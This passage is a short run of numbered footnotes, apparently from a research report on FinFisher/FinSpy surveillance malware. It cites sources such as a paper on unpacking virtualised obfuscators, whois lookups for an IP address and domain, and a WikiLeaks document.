http://blogs.aljazeera.com/profile/melissa-chan
4
This technique was used in the recent Madi malware attacks.
5
http://www.finfisher.com/
6
Unpacking Virtualised Obfuscators by Rolf Rolles –
http://static.usenix.org/event/woot09/tech/full_papers/rolles.pdf
7
http://whois.domaintools.com/77.69.140.194
8
E.g. http://wikileaks.org/spyfiles/files/0/289_GAMMA-201110-FinSpy.pdf
9
http://whois.domaintools.com/gamma-international.de
!
! 21